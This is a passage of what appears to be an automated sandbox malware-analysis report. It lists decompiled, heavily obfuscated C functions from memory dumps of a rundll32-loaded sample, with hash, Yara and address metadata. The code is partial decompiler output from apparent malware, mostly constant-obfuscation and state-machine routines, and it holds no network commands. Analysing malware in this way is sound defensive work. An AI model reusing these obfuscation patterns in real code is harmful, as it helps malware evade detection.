				_v12 = _v12 / _t93;
				_v12 = _v12 + 0xffff4f0e;
				_v12 = _v12 ^ 0xffff29d2;
				_v12 = 0xccb;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0xec83dd18;
				_v12 = _v12 ^ 0xec83c459;
				_v12 = 0x5097;
				_v12 = _v12 ^ 0x4b44d7e3;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0x43ba3a84;
				_v12 = 0x40e2;
				_t94 = 0x3f;
				_v12 = _v12 / _t94;
				_t95 = 0x6d;
				_v12 = _v12 * 0x4d;
				_v12 = _v12 / _t95;
				_v12 = _v12 ^ 0x000039be;
				_v8 = 0xf076;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 | 0x8ee36b54;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x08ee5ca2;
				return E001B3E7E(_v12, _v8, E001AFED4(), _t107);
			}

0x001ae388
0x001ae38b
0x001ae38d
0x001ae38e
0x001ae38f
0x001ae394
0x001ae3a2
0x001ae3a5
0x001ae3a8
0x001ae3a9
0x001ae3aa
0x001ae3b1
0x001ae3b5
0x001ae3bc
0x001ae3c3
0x001ae3c7
0x001ae3d5
0x001ae3d8
0x001ae3df
0x001ae3e9
0x001ae3ee
0x001ae3f3
0x001ae3fa
0x001ae401
0x001ae408
0x001ae40c
0x001ae413
0x001ae41a
0x001ae421
0x001ae428
0x001ae42c
0x001ae433
0x001ae43d
0x001ae442
0x001ae44b
0x001ae44c
0x001ae454
0x001ae457
0x001ae45e
0x001ae465
0x001ae469
0x001ae470
0x001ae474
0x001ae498

Strings

T, xrefs: 001AE3B5
@, xrefs: 001AE433

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: T$@
API String ID: 0-3095773534
Opcode ID: 744308df0420f918fb7b4ae415b579f48d2337887ea35fa3f6a136f4498b6d4a
Instruction ID: 7e9e9ee9c23e2f925212e872ad17774875bbf5ee34ce324c838eaa6e38017702
Opcode Fuzzy Hash: 744308df0420f918fb7b4ae415b579f48d2337887ea35fa3f6a136f4498b6d4a
Instruction Fuzzy Hash: 1931F371D0060CFBEB08DFA9D88A9DEBFB6EB54314F20C099E115A6291D7B54B94CF40

Uniqueness

Uniqueness Score: -1.00%

Function 1000DADD, Relevance: 1.5, APIs: 1, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E1000DADD(signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				signed int _t6;
				int _t8;

				_t5 =  *0x10028c58; // 0xe5c0110e
				_t6 = _t5 ^  *0x10026250;
				if(_t6 == 0) {
					 *0x10027ec4 = _a4;
					_t8 = EnumSystemLocalesW(E1000DAC9, 1);
					 *0x10027ec4 =  *0x10027ec4 & 0x00000000;
					return _t8;
				} else {
					return  *_t6(_a4, _a8, _a12, 0);
				}
			}

0x1000dae0
0x1000dae5
0x1000daeb
0x1000db06
0x1000db0b
0x1000db11
0x1000db19
0x1000daed
0x1000dafb
0x1000dafb

APIs

EnumSystemLocalesW.KERNEL32(1000DAC9,00000001,?,100173EA,10017488,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 1000DB0B

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 7da0b14676785b7d30de579b9643e80c64cd820a1ed95259ddee8cf624ee3724
Instruction ID: aad8bd1e5b4d75bfd26d9275691b19f74e62e4c4610560c20080c3c5ec1ec939
Opcode Fuzzy Hash: 7da0b14676785b7d30de579b9643e80c64cd820a1ed95259ddee8cf624ee3724
Instruction Fuzzy Hash: 9BE08C35114218EBFF02EFD4DC85B993BA4FB08360F208486F60C4A1A0C7B1A9618B24

Uniqueness

Uniqueness Score: -1.00%

Function 1000DB1A, Relevance: 1.5, APIs: 1, Instructions: 18COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,20001004,?,10011E69,?,10011E69,?,20001004,?,00000002,?,00000004,?,00000000), ref: 1000DB41

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: ccf0174b4bd2a2563bd03d80a9abb15b4519cc8635f7c5da6b6d50386adc744d
Instruction ID: c31d3c7fe1e8bfd3c793b1678d32e9442c14c4a730e739281b39d14faa86b3d9
Opcode Fuzzy Hash: ccf0174b4bd2a2563bd03d80a9abb15b4519cc8635f7c5da6b6d50386adc744d
Instruction Fuzzy Hash: 7CD06736004119EFEF01EFE0EC8596A3BA9FB49264B544446F91896124DB32E9219B61

Uniqueness

Uniqueness Score: -1.00%

Function 001B1913, Relevance: 1.4, Strings: 1, Instructions: 171
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E001B1913(intOrPtr* __ecx, void* __edx, signed int _a4, intOrPtr _a8) {
				char _v44;
				void* _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t134;
				signed int _t160;
				intOrPtr* _t162;
				void* _t164;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int* _t192;

				_t189 = _a4;
				_t162 = __ecx;
				_push(_a8);
				_push(_t189);
				_push(__ecx);
				E001AD571(_t134);
				_v60 = 0x27564a;
				_t192 =  &(( &_v104)[4]);
				asm("stosd");
				_t164 = 0x9f4bb1d;
				asm("stosd");
				asm("stosd");
				_a4 = 0x6c90;
				_a4 = _a4 ^ 0x26e4ba50;
				_t184 = 0x6e;
				_a4 = _a4 / _t184;
				_a4 = _a4 + 0xffff6dce;
				_a4 = _a4 ^ 0x0059bfaf;
				_v68 = 0x8d8c;
				_t185 = 0x38;
				_v68 = _v68 * 0x1a;
				_v68 = _v68 ^ 0x000e0796;
				_v80 = 0x3bf9;
				_v80 = _v80 + 0xffffcf83;
				_v80 = _v80 | 0x87b471f2;
				_v80 = _v80 ^ 0x87b446bb;
				_v84 = 0x7b97;
				_v84 = _v84 + 0xffff7cb6;
				_v84 = _v84 + 0xffffe0d8;
				_v84 = _v84 ^ 0xffffe2a4;
				_v100 = 0x118d;
				_v100 = _v100 << 4;
				_v100 = _v100 + 0xffffbb90;
				_v100 = _v100 * 0x5c;
				_v100 = _v100 ^ 0x004c7482;
				_v104 = 0x50b0;
				_v104 = _v104 + 0x51cd;
				_v104 = _v104 >> 5;
				_v104 = _v104 * 0x64;
				_v104 = _v104 ^ 0x0001fcaa;
				_v88 = 0x943a;
				_v88 = _v88 + 0xffff5264;
				_v88 = _v88 >> 9;
				_v88 = _v88 ^ 0xf6f04849;
				_v88 = _v88 ^ 0xf68fc020;
				_v92 = 0xda3d;
				_v92 = _v92 ^ 0xb0b87cdf;
				_v92 = _v92 + 0xffffdf05;
				_v92 = _v92 / _t185;
				_v92 = _v92 ^ 0x0327b260;
				_v96 = 0x22ab;
				_t186 = 0x3e;
				_v96 = _v96 / _t186;
				_v96 = _v96 ^ 0xe0c4f04d;
				_v96 = _v96 ^ 0xf8852d67;
				_v96 = _v96 ^ 0x1841b5f7;
				_v72 = 0xbc45;
				_t187 = 0x56;
				_v72 = _v72 / _t187;
				_v72 = _v72 | 0x9b744b3c;
				_v72 = _v72 ^ 0x9b7402fa;
				_v64 = 0x8dae;
				_v64 = _v64 << 3;
				_v64 = _v64 ^ 0x0004471e;
				_v76 = 0x56f8;
				_v76 = _v76 + 0xffff2bfd;
				_v76 = _v76 + 0x4508;
				_v76 = _v76 ^ 0xffff8678;
				do {
					while(_t164 != 0x9f4bb1d) {
						if(_t164 == 0xf085216) {
							E001A25A5( *_t162, _v88, _v92,  &_v44, _v96);
							_t192 =  &(_t192[3]);
							_t164 = 0x243edee0;
							continue;
						} else {
							if(_t164 == 0x21821957) {
								E001BC395(_v100,  &_v44, _t189, _v104);
								_t164 = 0xf085216;
								continue;
							} else {
								if(_t164 == 0x243edee0) {
									E001B4A77(_v72, _v64, __eflags, _t162 + 4,  &_v44, _v76);
								} else {
									if(_t164 == 0x2587d65c) {
										_push(_t164);
										_push(_t164);
										_t160 = E001B922B(_t189[1]);
										_t192 =  &(_t192[3]);
										 *_t189 = _t160;
										__eflags = _t160;
										if(__eflags != 0) {
											_t164 = 0x21821957;
											continue;
										}
									} else {
										if(_t164 != 0x2688d56c) {
											goto L13;
										} else {
											_t189[1] = E001ACF5B(_t162);
											_t164 = 0x2587d65c;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t189;
						_t133 =  *_t189 != 0;
						__eflags = _t133;
						return 0 | _t133;
					}
					 *_t189 = 0;
					_t164 = 0x2688d56c;
					_t189[1] = 0;
					L13:
					__eflags = _t164 - 0x28c45859;
				} while (__eflags != 0);
				goto L16;
			}

0x001b1919
0x001b191d
0x001b1920
0x001b1927
0x001b1929
0x001b192a
0x001b192f
0x001b193d
0x001b1940
0x001b1943
0x001b194a
0x001b194b
0x001b194c
0x001b1957
0x001b1969
0x001b196e
0x001b1977
0x001b1982
0x001b198d
0x001b199a
0x001b199d
0x001b19a1
0x001b19a9
0x001b19b1
0x001b19b9
0x001b19c1
0x001b19c9
0x001b19d1
0x001b19d9
0x001b19e1
0x001b19e9
0x001b19f1
0x001b19f6
0x001b1a03
0x001b1a07
0x001b1a0f
0x001b1a17
0x001b1a1f
0x001b1a29
0x001b1a2d
0x001b1a35
0x001b1a3d
0x001b1a45
0x001b1a4a
0x001b1a52
0x001b1a5a
0x001b1a62
0x001b1a6a
0x001b1a7a
0x001b1a7e
0x001b1a86
0x001b1a92
0x001b1a95
0x001b1a99
0x001b1aa1
0x001b1aa9
0x001b1ab3
0x001b1ac1
0x001b1ac9
0x001b1acd
0x001b1ad5
0x001b1add
0x001b1ae5
0x001b1aea
0x001b1af2
0x001b1afa
0x001b1b02
0x001b1b0a
0x001b1b14
0x001b1b14
0x001b1b26
0x001b1bb5
0x001b1bba
0x001b1bbd
0x00000000
0x001b1b28
0x001b1b2a
0x001b1b91
0x001b1b98
0x00000000
0x001b1b2c
0x001b1b32
0x001b1bf4
0x001b1b38
0x001b1b3e
0x001b1b6d
0x001b1b6e
0x001b1b72
0x001b1b77
0x001b1b7a
0x001b1b7c
0x001b1b7e
0x001b1b80
0x00000000
0x001b1b80
0x001b1b40
0x001b1b46
0x00000000
0x001b1b4c
0x001b1b53
0x001b1b56
0x00000000
0x001b1b56
0x001b1b46
0x001b1b3e
0x001b1b32
0x001b1b2a
0x001b1bfc
0x001b1bfe
0x001b1c03
0x001b1c03
0x001b1c0a
0x001b1c0a
0x001b1bc7
0x001b1bc9
0x001b1bce
0x001b1bd1
0x001b1bd1
0x001b1bd1
0x00000000

Strings

JV', xrefs: 001B192F

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: JV'
API String ID: 0-3416759997
Opcode ID: f262a403c706c50c6a265df25bb8a35ef7b9b84f3a0b2d9e4ec8b7c033bbbcf6
Instruction ID: f5208fd27b1de3b45b81c3f1249bd3e1a7a2c09beba03e1f71906883eba5b54c
Opcode Fuzzy Hash: f262a403c706c50c6a265df25bb8a35ef7b9b84f3a0b2d9e4ec8b7c033bbbcf6
Instruction Fuzzy Hash: 1D716971508341ABD368CF25C99995BBBE1FFD4358F908A1DF0C696260E7B0DA49CF82

Uniqueness

Uniqueness Score: -1.00%

Function 001A6005, Relevance: 1.4, Strings: 1, Instructions: 117
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E001A6005(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v588;
				void* _t124;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				signed int _t147;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AD571(_t124);
				_v56 = _v56 & 0x00000000;
				_v68 = 0x42b1ea;
				_v64 = 0x415067;
				_v60 = 0x957a2;
				_v48 = 0xfe39;
				_v48 = _v48 >> 0xa;
				_v48 = _v48 ^ 0x000061d4;
				_v32 = 0x6515;
				_v32 = _v32 + 0xffff65f3;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0xf2c232dd;
				_v28 = 0x14e5;
				_v28 = _v28 + 0xffff19be;
				_t144 = 0xd;
				_v28 = _v28 * 0x4b;
				_v28 = _v28 ^ 0xffc2f25e;
				_v24 = 0xe4e1;
				_v24 = _v24 * 0x6e;
				_v24 = _v24 | 0x8d7bef82;
				_v24 = _v24 ^ 0x8d7baf1f;
				_v40 = 0xb91c;
				_v40 = _v40 >> 0xf;
				_v40 = _v40 ^ 0x00004e56;
				_v8 = 0xcb46;
				_v8 = _v8 + 0xe648;
				_v8 = _v8 / _t144;
				_t145 = 0x55;
				_v8 = _v8 * 0x19;
				_v8 = _v8 ^ 0x00031206;
				_v16 = 0x65f6;
				_v16 = _v16 << 3;
				_v16 = _v16 << 0xf;
				_v16 = _v16 ^ 0x0ff0f14b;
				_v16 = _v16 ^ 0x9828a994;
				_v52 = 0x8105;
				_v52 = _v52 + 0xffffd602;
				_v52 = _v52 ^ 0x00007212;
				_v12 = 0x703c;
				_v12 = _v12 | 0xf2e8f3d1;
				_v12 = _v12 / _t145;
				_v12 = _v12 + 0xffffb4c1;
				_v12 = _v12 ^ 0x02db00eb;
				_v36 = 0x1bb4;
				_t146 = 0x33;
				_v36 = _v36 / _t146;
				_v36 = _v36 + 0xffffa3a3;
				_v36 = _v36 ^ 0xffffa330;
				_v44 = 0x1dab;
				_v44 = _v44 >> 4;
				_v44 = _v44 ^ 0x00001da0;
				_v20 = 0x2eda;
				_v20 = _v20 >> 6;
				_t147 = 0x2d;
				_v20 = _v20 / _t147;
				_v20 = _v20 << 0xc;
				_v20 = _v20 ^ 0x00006d08;
				_push(_v28);
				_push(_v32);
				E001A56BE(_v24, _v20, _v48, E001A5EBA(_v48, 0x1001f960, _v20), _v40, _v8, _v16,  &_v588);
				E001AED35(_v52, _t137, _v12, _v36);
				return E001A7689(_v44, _v20,  &_v588);
			}

0x001a600f
0x001a6012
0x001a6015
0x001a6018
0x001a6019
0x001a601a
0x001a601f
0x001a6025
0x001a602c
0x001a6033
0x001a603a
0x001a6041
0x001a6045
0x001a604c
0x001a6053
0x001a605a
0x001a605e
0x001a6065
0x001a606c
0x001a6079
0x001a607c
0x001a607f
0x001a6086
0x001a6091
0x001a6094
0x001a609b
0x001a60a2
0x001a60a9
0x001a60ad
0x001a60b4
0x001a60bb
0x001a60c9
0x001a60d0
0x001a60d3
0x001a60d6
0x001a60dd
0x001a60e4
0x001a60e8
0x001a60ec
0x001a60f3
0x001a60fa
0x001a6101
0x001a6108
0x001a610f
0x001a6116
0x001a6124
0x001a6127
0x001a612e
0x001a6135
0x001a613f
0x001a6144
0x001a6149
0x001a6150
0x001a6157
0x001a615e
0x001a6162
0x001a6169
0x001a6170
0x001a6177
0x001a617a
0x001a617d
0x001a6181
0x001a618d
0x001a6190
0x001a61b8
0x001a61c8
0x001a61e6

Strings

gPA, xrefs: 001A602C

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: gPA
API String ID: 0-163129573
Opcode ID: 591ffaa1b257cd2df6ef0a408477b2b39e05e1a622b22dcf631579c93ad96243
Instruction ID: 3bed13c23b0249cb60afe2420e499bb9fb5d1bde30a32e33086af6597a9525a7
Opcode Fuzzy Hash: 591ffaa1b257cd2df6ef0a408477b2b39e05e1a622b22dcf631579c93ad96243
Instruction Fuzzy Hash: 6A51EEB1D0021DABDF19DFE5C94A8DEBBB2FF48304F108149E015B62A0D7B90A45DF90

Uniqueness

Uniqueness Score: -1.00%

Function 001B4F60, Relevance: 1.4, Strings: 1, Instructions: 112
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E001B4F60() {
				signed char _v2;
				signed int _v276;
				signed int _v280;
				char _v284;
				signed short _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				void* _t86;
				signed int _t100;
				signed int _t101;
				intOrPtr _t103;

				_v332 = 0x4da377;
				_v328 = 0x2fced2;
				_t86 = 0xc6f1f79;
				_t103 = 0;
				_v324 = 0;
				_v336 = 0x40af;
				_v336 = _v336 + 0xffff1543;
				_v336 = _v336 ^ 0xffff76e6;
				_v348 = 0x8105;
				_t100 = 0x64;
				_v348 = _v348 / _t100;
				_t101 = 3;
				_v348 = _v348 * 0xb;
				_v348 = _v348 ^ 0x00003723;
				_v344 = 0x36a8;
				_v344 = _v344 | 0xeb7bff84;
				_v344 = _v344 / _t101;
				_v344 = _v344 ^ 0x4e7ea87a;
				_v352 = 0x22f1;
				_v352 = _v352 << 0xf;
				_v352 = _v352 * 0x36;
				_v352 = _v352 ^ 0xaf6b7d5d;
				_v340 = 0xefc4;
				_v340 = _v340 * 0x62;
				_v340 = _v340 + 0xfd8e;
				_v340 = _v340 ^ 0x005ccf04;
				_v356 = 0xc16;
				_v356 = _v356 >> 4;
				_v356 = _v356 ^ 0xee97cc61;
				_v356 = _v356 << 1;
				_v356 = _v356 ^ 0xdd2f873d;
				do {
					while(_t86 != 0xc6f1f79) {
						if(_t86 == 0x16b1523b) {
							_v284 = 0x11c;
							E001A23D8(_v336, _v348,  &_v284, _v344);
							_t86 = 0x30fa3360;
							continue;
						} else {
							if(_t86 == 0x1922504a) {
								_t103 = _t103 + (_v320 & 0x0000ffff);
							} else {
								if(_t86 == 0x30fa3360) {
									E001B1215( &_v320, _v340, _v356);
									_t86 = 0x319352e1;
									continue;
								} else {
									if(_t86 == 0x319352e1) {
										_t86 = 0x39779ed1;
										_t103 = _t103 + (_v2 & 0x000000ff) * 0x186a0;
										continue;
									} else {
										if(_t86 == 0x33dba970) {
											_t86 = 0x1922504a;
											_t103 = _t103 + _v276 * 0x64;
											continue;
										} else {
											if(_t86 != 0x39779ed1) {
												goto L14;
											} else {
												_t86 = 0x33dba970;
												_t103 = _t103 + _v280 * 0x3e8;
												continue;
											}
										}
									}
								}
							}
						}
						L17:
						return _t103;
					}
					_t86 = 0x16b1523b;
					L14:
				} while (_t86 != 0xbeb5534);
				goto L17;
			}

0x001b4f66
0x001b4f70
0x001b4f78
0x001b4f80
0x001b4f87
0x001b4f90
0x001b4f98
0x001b4fa0
0x001b4fa8
0x001b4fb7
0x001b4fbc
0x001b4fc7
0x001b4fc8
0x001b4fcc
0x001b4fd4
0x001b4fdc
0x001b4fef
0x001b4ff3
0x001b4ffb
0x001b5003
0x001b5015
0x001b5019
0x001b5021
0x001b502e
0x001b5032
0x001b503a
0x001b5042
0x001b504a
0x001b504f
0x001b5057
0x001b505b
0x001b5063
0x001b5063
0x001b5071
0x001b50f9
0x001b5101
0x001b5108
0x00000000
0x001b5073
0x001b5075
0x001b5127
0x001b507b
0x001b5081
0x001b50d7
0x001b50de
0x00000000
0x001b5083
0x001b5089
0x001b50b8
0x001b50c3
0x00000000
0x001b508b
0x001b508d
0x001b50aa
0x001b50ac
0x00000000
0x001b508f
0x001b5095
0x00000000
0x001b5097
0x001b509f
0x001b50a1
0x00000000
0x001b50a1
0x001b5095
0x001b508d
0x001b5089
0x001b5081
0x001b5075
0x001b512a
0x001b5135
0x001b5135
0x001b5112
0x001b5114
0x001b5114
0x00000000

Strings

#7, xrefs: 001B4FCC

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #7
API String ID: 0-1204666513
Opcode ID: 5b72a70d6b7ae402061760a71ea162cc73a4b299acbd532641d1a1abe9a2a79c
Instruction ID: cfe55e42876b1395a3fbf3180d81d2416836e7948468a4a85b0f3efc659439b7
Opcode Fuzzy Hash: 5b72a70d6b7ae402061760a71ea162cc73a4b299acbd532641d1a1abe9a2a79c
Instruction Fuzzy Hash: 9941577150C3428BD718CF25D4956ABFBE6BBC4744F144A2EF49696290C7B8CA0A8F93

Uniqueness

Uniqueness Score: -1.00%

Function 001B66AE, Relevance: 1.4, Strings: 1, Instructions: 108
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E001B66AE(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _t114;
				signed int _t131;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				void* _t148;
				void* _t153;

				_t153 = __eflags;
				_t148 = __edx;
				E001AD571(_t114);
				_v52 = _v52 & 0x00000000;
				_v64 = 0x3d1bc8;
				_v60 = 0x288dc5;
				_v56 = 0x405ded;
				_v20 = 0xe9c8;
				_v20 = _v20 + 0xffff3e23;
				_t135 = 0x45;
				_v20 = _v20 / _t135;
				_v20 = _v20 ^ 0x00000757;
				_v28 = 0xf93a;
				_v28 = _v28 >> 6;
				_v28 = _v28 ^ 0x00005820;
				_v24 = 0xacb5;
				_v24 = _v24 + 0x8cc5;
				_v24 = _v24 >> 3;
				_v24 = _v24 ^ 0x00003187;
				_v36 = 0xb78d;
				_v36 = _v36 ^ 0x3da15357;
				_v36 = _v36 ^ 0x3da1b5a1;
				_v8 = 0xf47;
				_v8 = _v8 + 0xffffc5ed;
				_v8 = _v8 << 1;
				_v8 = _v8 + 0xffffad9f;
				_v8 = _v8 ^ 0xffff0024;
				_v32 = 0xad63;
				_v32 = _v32 | 0x745b6cf3;
				_v32 = _v32 ^ 0x745bf39a;
				_v44 = 0xa383;
				_v44 = _v44 + 0xfffffb73;
				_v44 = _v44 ^ 0x0000f2fb;
				_v16 = 0x1b40;
				_t136 = 0x2a;
				_v16 = _v16 / _t136;
				_v16 = _v16 ^ 0x2015cc97;
				_v16 = _v16 * 0x14;
				_v16 = _v16 ^ 0x81b39c03;
				_v40 = 0x55b3;
				_v40 = _v40 + 0x83ab;
				_v40 = _v40 ^ 0x0000a5c2;
				_v12 = 0x1001;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0xc0f47d5b;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x303d7baf;
				_v48 = E001B0614();
				_v20 = 0xa41;
				_t137 = 0x57;
				_v20 = _v20 * 0x48;
				_v20 = _v20 / _t137;
				_v20 = _v20 ^ 0x00000878;
				_v28 = 0x3a0c;
				_v28 = _v28 + 0xffffd15a;
				_v28 = _v28 ^ 0x00000b76;
				_t131 = E001B820A(_v28, _v20 % _t137, _t153, _v20);
				0x1a05b2(1, _v16, _t148, _v40, _v12,  &_v48, __ecx, __edx, _a4, _a8);
				 *((short*)(_t148 + _t131 * 2)) = 0;
				return 0;
			}

0x001b66ae
0x001b66b9
0x001b66c0
0x001b66c5
0x001b66cb
0x001b66d2
0x001b66d9
0x001b66e0
0x001b66e7
0x001b66f3
0x001b66f8
0x001b66fd
0x001b6704
0x001b670b
0x001b670f
0x001b6716
0x001b671d
0x001b6724
0x001b6728
0x001b672f
0x001b6736
0x001b673d
0x001b6744
0x001b674b
0x001b6752
0x001b6755
0x001b675c
0x001b6763
0x001b676a
0x001b6771
0x001b6778
0x001b677f
0x001b6786
0x001b678d
0x001b6797
0x001b679a
0x001b679d
0x001b67a8
0x001b67ab
0x001b67b2
0x001b67b9
0x001b67c0
0x001b67c7
0x001b67ce
0x001b67d2
0x001b67d9
0x001b67dd
0x001b67ef
0x001b67f4
0x001b6801
0x001b6802
0x001b680a
0x001b680d
0x001b6814
0x001b681b
0x001b6822
0x001b683e
0x001b685a
0x001b6864
0x001b686d

Strings

]@, xrefs: 001B66D9

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ]@
API String ID: 0-2650338837
Opcode ID: 93b28bacf92f949d979fa551b1d67ef7feed656ded9c78951c5debf02560370d
Instruction ID: 38cf8e121c6d8d6e5728a1d7cf1b2b48c35b062507406e5a328e24b0a6d9683c
Opcode Fuzzy Hash: 93b28bacf92f949d979fa551b1d67ef7feed656ded9c78951c5debf02560370d
Instruction Fuzzy Hash: 285100B1D0070AEBDF08DFA5C94A9EEBBB1FF48314F208159E415B62A0D7B85A44CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001B2A00, Relevance: 1.3, Strings: 1, Instructions: 83
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E001B2A00(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v4;
				unsigned int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t65;
				void* _t81;
				signed int _t83;
				signed int _t84;
				void* _t94;
				void* _t95;
				void* _t96;

				_push(_a24);
				_t81 = __edx;
				_t96 = __ecx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AD571(_t65);
				_v8 = 0xd583;
				_v8 = _v8 >> 2;
				_t95 = 0;
				_v8 = _v8 ^ 0x00002a9d;
				_v12 = 0x4196;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0x78f8;
				_v12 = _v12 ^ 0x00007525;
				_v24 = 0xcbcf;
				_v24 = _v24 + 0x160f;
				_v24 = _v24 ^ 0xf9f05095;
				_t83 = 0x7a;
				_v24 = _v24 / _t83;
				_v24 = _v24 ^ 0x020c3e73;
				_v16 = 0xa2b9;
				_t84 = 0x61;
				_v16 = _v16 * 0x19;
				_v16 = _v16 / _t84;
				_v16 = _v16 ^ 0x00007892;
				_v4 = 0xc1c2;
				_v4 = _v4 << 0xb;
				_v4 = _v4 ^ 0x060e67f1;
				_v20 = 0xaf46;
				_v20 = _v20 * 0x60;
				_v20 = _v20 + 0x135d;
				_v20 = _v20 >> 7;
				_v20 = _v20 ^ 0x0000b094;
				_t94 = E001B922B(0x40000);
				if(_t94 != 0) {
					_push(_t94);
					_push(_t81);
					_push(_a12);
					_t95 = E001A17DD(_t96, _a24);
					E001AE380(_v4, _t94, _v20);
				}
				return _t95;
			}

0x001b2a07
0x001b2a0b
0x001b2a0d
0x001b2a0f
0x001b2a13
0x001b2a17
0x001b2a1b
0x001b2a1f
0x001b2a23
0x001b2a24
0x001b2a25
0x001b2a2a
0x001b2a34
0x001b2a39
0x001b2a3b
0x001b2a43
0x001b2a4b
0x001b2a50
0x001b2a58
0x001b2a60
0x001b2a68
